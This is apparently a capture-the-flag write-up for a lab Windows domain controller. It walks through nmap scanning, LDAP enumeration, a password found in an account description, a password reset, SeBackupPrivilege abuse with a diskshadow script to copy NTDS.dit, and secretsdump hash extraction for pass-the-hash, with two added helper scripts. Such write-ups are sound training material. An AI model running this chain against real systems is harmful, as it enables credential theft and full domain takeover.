$ nmap -sV -sC -PN -p- -oA baby_nmap 10.129.189.110
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-27 23:35 CEST
Nmap scan report for 10.129.189.110
Host is up (0.028s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-27 21:38:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-09-27T21:39:40+00:00; +20s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2025-08-18T12:14:43
|_Not valid after: 2026-02-17T12:14:43
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| DNS_Tree_Name: baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-09-27T21:39:00+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
51410/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
51411/tcp open msrpc Microsoft Windows RPC
51420/tcp open msrpc Microsoft Windows RPC
53398/tcp open msrpc Microsoft Windows RPC
64823/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
A second scan of the common UDP ports only confirmed 53/UDP (DNS) as open; the remaining ports are reported open|filtered, meaning no response was received:
$ sudo nmap -sV -sC -PN -sU -p 53,69,161,162,10161,10162,623 10.129.189.110
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-27 23:41 CEST
Nmap scan report for 10.129.189.110
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
53/udp open domain Simple DNS Plus
69/udp open|filtered tftp
161/udp open|filtered snmp
162/udp open|filtered snmptrap
623/udp open|filtered asf-rmcp
10161/udp open|filtered snmpdtls
10162/udp open|filtered snmpdtls-trap
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Although there are a lot of open ports, all of them are expected on a domain controller and none of them stands out. The domain controller does run an SMB server, but both anonymous access and the guest account have been disabled:
The output above lists the accounts by their distinguished names. A more useful list of user account names can be generated by querying LDAP for each user's sAMAccountName attribute with ldapsearch:
Before moving on to noisier enumeration methods, it is worth checking the description field of each account. NetExec has a built-in module for this, invoked with -M get-desc-users:
$ nxc ldap 10.129.189.110 -u '' -p '' -M get-desc-users
SMB 10.129.189.110 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
LDAP 10.129.189.110 389 BABYDC [+] baby.vl\:
GET-DESC... 10.129.189.110 389 BABYDC [+] Found following users:
GET-DESC... 10.129.189.110 389 BABYDC User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.129.189.110 389 BABYDC User: Teresa.Bell description: Set initial password to BabyStart123!
From the description field, it looks like the initial password for new users might be BabyStart123!. If so, Teresa.Bell has changed their password since, as authenticating with the initial password returned an error:
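As an added example (not part of the original write-up), the script below parses the kind of LDIF that ldapsearch prints for user objects and derives the two lists discussed above: the sAMAccountName of every account, and any description that looks like it contains a credential. It also reports entries that have no sAMAccountName at all, which is one reason an account can be absent from a list built from that attribute; whether that was the case for Caroline Robinson is not shown on this page. The LDIF sample is constructed for the example (only Teresa.Bell's description is taken from the page; the other entries and values are made up). Two details matter in practice and are handled here: ldapsearch folds long values onto continuation lines that start with a single space, and it base64-encodes any value that begins with a space or contains non-ASCII characters (the `::` form), so a plain grep for "password" over the raw output misses those.

```python
import base64
import re

# Constructed sample in the shape "ldapsearch -LLL ... sAMAccountName description"
# prints for user objects. Only Teresa.Bell's description comes from the page;
# every other entry and value is made up for this example.
_HIDDEN_DESC = " Temporary password: Welcome1!"  # leading space => ldapsearch emits it base64-encoded
_B64_DESC = base64.b64encode(_HIDDEN_DESC.encode()).decode()
SAMPLE_LDIF = (
    "dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl\n"
    "sAMAccountName: Teresa.Bell\n"
    "description: Set initial password to BabyStart123!\n"
    "\n"
    "dn: CN=New Hire,OU=it,DC=baby,DC=vl\n"
    "description: Onboarding pending\n"
    "\n"
    "dn: CN=Svc Backup,OU=it,DC=baby,DC=vl\n"
    "sAMAccountName: svc.backup\n"
    # ldapsearch folds long values; the continuation line starts with one space
    "description: Backup service account, see ticket 4411 for the creden\n"
    " tials\n"
    "\n"
    "dn: CN=Some Admin,CN=Users,DC=baby,DC=vl\n"
    "sAMAccountName: Some.Admin\n"
    f"description:: {_B64_DESC}\n"
)

# Words that suggest a description carries a credential (extend as needed)
CREDENTIAL_HINT = re.compile(r"pass(word|wd)?|pwd|cred|secret|pw\b", re.IGNORECASE)


def parse_ldif(text):
    """Parse LDIF into a list of {attribute: [values]} dicts, one per entry.
    Handles folded continuation lines and base64 ('::') values."""
    entries = []
    pending = []  # [name, is_base64, raw_value] for the entry being read

    def flush():
        if not pending:
            return
        entry = {}
        for name, is_b64, raw in pending:
            value = base64.b64decode(raw).decode("utf-8", "replace") if is_b64 else raw
            entry.setdefault(name, []).append(value)
        entries.append(entry)
        pending.clear()

    for line in text.splitlines():
        if not line:                  # a blank line terminates the entry
            flush()
        elif line.startswith("#"):    # comment line
            continue
        elif line.startswith(" "):    # continuation: append to the previous value
            pending[-1][2] += line[1:]
        else:
            name, _, rest = line.partition(":")
            if rest.startswith(":"):  # "attr:: <base64>"
                pending.append([name, True, rest[1:].strip()])
            else:                     # "attr: <value>" with one optional space after the colon
                pending.append([name, False, rest[1:] if rest.startswith(" ") else rest])
    flush()
    return entries


def account_names(entries):
    """sAMAccountName of every entry that has one, in directory order."""
    return [e["sAMAccountName"][0] for e in entries if "sAMAccountName" in e]


def without_attribute(entries, attribute="sAMAccountName"):
    """DNs of entries lacking the attribute; these never show up in account_names()."""
    return [e["dn"][0] for e in entries if attribute not in e]


def credential_hints(entries):
    """(account, description) for every description that mentions something password-like."""
    hits = []
    for e in entries:
        label = e.get("sAMAccountName", e["dn"])[0]
        for desc in e.get("description", []):
            if CREDENTIAL_HINT.search(desc):
                hits.append((label, desc))
    return hits


if __name__ == "__main__":
    found = parse_ldif(SAMPLE_LDIF)
    print("accounts:", ", ".join(account_names(found)))
    print("no sAMAccountName:", without_attribute(found))
    for account, desc in credential_hints(found):
        print(f"{account}: {desc!r}")
```

To run it against a real export, replace SAMPLE_LDIF with the contents of an ldapsearch output file; the folded and base64-encoded cases are exactly the ones a line-oriented grep would skip.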
Going back to the two lists of users obtained with nxc and ldapsearch, one user (Caroline Robinson) is missing from the second list. In fact, when querying LDAP for this user, it looks like the account isn't fully set up. A password that the DC rejects for a normal logon (for instance one that has expired or must be changed at first use) can still be replaced with smbpasswd -r, which uses the SAMR password-change call rather than an authenticated session:
$ smbpasswd -r 10.129.189.110 -U caroline.robinson
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user caroline.robinson
With the password set, the target can be accessed as Caroline.Robinson using Evil-WinRM:
*Evil-WinRM* PS C:\Users\Caroline.Robinson\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeBackupPrivilege allows a user to read any file for backup purposes, regardless of the ACL on the file or the folder that contains it. On a domain controller this includes the NTDS.dit database, which holds the password hashes of every domain account and can therefore be used for a domain takeover. Because the directory service keeps NTDS.dit open while it runs, the file cannot simply be copied from its live location; it has to be read from a shadow copy.
There are several ways of obtaining NTDS.dit; one is to create a shadow copy of C:\ and copy the file out of it with the Copy-FileSeBackupPrivilege cmdlet from the SeBackupPrivilege toolkit.
The toolkit first needs to be uploaded and imported on the target. The shadow copy itself is created with diskshadow.exe, but the tool cannot be used interactively from the Evil-WinRM shell, as it has no real console to read commands from:
*Evil-WinRM* PS C:\Users\Caroline.Robinson>diskshadow.exe
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 9/28/2025 8:10:55 PM
DISKSHADOW> Error reading from console. Win32 error: 0x(null)
The pipe has been ended.
Fortunately, the tool can be run in batch mode with the /s argument. The batch file is a plain text file containing the commands to create a shadow copy of C:\ and expose it as a drive letter:
$ cat backup.txt
set context persistent nowriters
add volume c: alias pwn
create
expose %pwn% z:
Important
DiskShadow does not process files with UNIX line endings correctly. The batch file is accepted and processed without any error message, but no shadow copy is created.
If the batch file is created on Linux, it needs to be converted to DOS (CRLF) line endings before upload. With a correctly formatted file, the shadow copy is created and exposed as expected:
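Added example, not from the original write-up: a small Python helper that writes the DiskShadow batch file shown above with CRLF line endings, and checks an existing file for the LF-only or mixed endings that make DiskShadow silently do nothing. The volume, alias and drive letter default to the values used on this page, and the file name backup.txt is the page's. The conversion normalises CRLF to LF first, because a naive replacement of LF with CRLF on a file that already has some CRLF lines produces CR CR LF on those lines.

```python
import sys


def diskshadow_script(volume="c:", alias="pwn", drive="z:"):
    """The four DiskShadow commands from the page, each terminated with CRLF."""
    lines = (
        "set context persistent nowriters",
        f"add volume {volume} alias {alias}",
        "create",
        f"expose %{alias}% {drive}",
    )
    return "".join(line + "\r\n" for line in lines).encode("ascii")


def to_dos_line_endings(data):
    """Convert to CRLF. Existing CRLF pairs are reduced to LF first so that a
    mixed file does not end up with CR CR LF on the lines that were already right."""
    return data.replace(b"\r\n", b"\n").replace(b"\n", b"\r\n")


def has_dos_line_endings(data):
    """True only when every line ends with CRLF and the file ends with a newline;
    LF-only, mixed and unterminated files all return False."""
    if not data.endswith(b"\n"):
        return False
    return all(line.endswith(b"\r") for line in data[:-1].split(b"\n"))


def write_script(path, **kwargs):
    """Write the batch file in binary mode so no platform newline translation happens."""
    data = diskshadow_script(**kwargs)
    with open(path, "wb") as fh:
        fh.write(data)
    return data


def convert_file(path):
    """Fix an existing batch file in place; returns True if it had to be changed."""
    with open(path, "rb") as fh:
        data = fh.read()
    fixed = to_dos_line_endings(data)
    if fixed != data:
        with open(path, "wb") as fh:
            fh.write(fixed)
    return fixed != data


if __name__ == "__main__":
    # usage: python3 mkshadow.py [backup.txt]   (script name is hypothetical)
    path = sys.argv[1] if len(sys.argv) > 1 else "backup.txt"
    write_script(path)
    with open(path, "rb") as fh:
        print(path, "ok" if has_dos_line_endings(fh.read()) else "BAD line endings")
```

Running the check before uploading is cheaper than re-running diskshadow and wondering why the "create" step produced nothing; unix2dos does the same conversion if it is installed.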
*Evil-WinRM* PS C:\Users\Caroline.Robinson> diskshadow.exe /s backup.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 9/28/2025 8:43:50 PM
-> set context persistent nowriters
-> add volume c: alias pwn
-> create
Alias pwn for shadow ID {33c2e824-2914-4d85-8076-6001a6c7e1b8} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {5b3515bd-50c5-4106-b715-d946b4f4f406} set as environment variable.
Querying all shadow copies with the shadow copy set ID {5b3515bd-50c5-4106-b715-d946b4f4f406}
* Shadow copy ID = {33c2e824-2914-4d85-8076-6001a6c7e1b8} %pwn%
- Shadow copy set: {5b3515bd-50c5-4106-b715-d946b4f4f406} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{711fc68a-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 9/28/2025 8:43:50 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %pwn% z:
-> %pwn% = {33c2e824-2914-4d85-8076-6001a6c7e1b8}
The shadow copy was successfully exposed as z:\.
->
NTDS.dit can then be copied out of the shadow copy with the Copy-FileSeBackupPrivilege cmdlet. The SYSTEM registry hive is needed as well, since it holds the boot key that secretsdump uses to decrypt the hashes (it appears as system.sav below). With both files on the attacking machine, the hashes can be extracted offline:
$ impacket-secretsdump -ntds ntds.dit -system system.sav LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:...
The NT hash of the Administrator account from the dump above can then be used to access the target as Administrator with Evil-WinRM (pass-the-hash, no plaintext password required):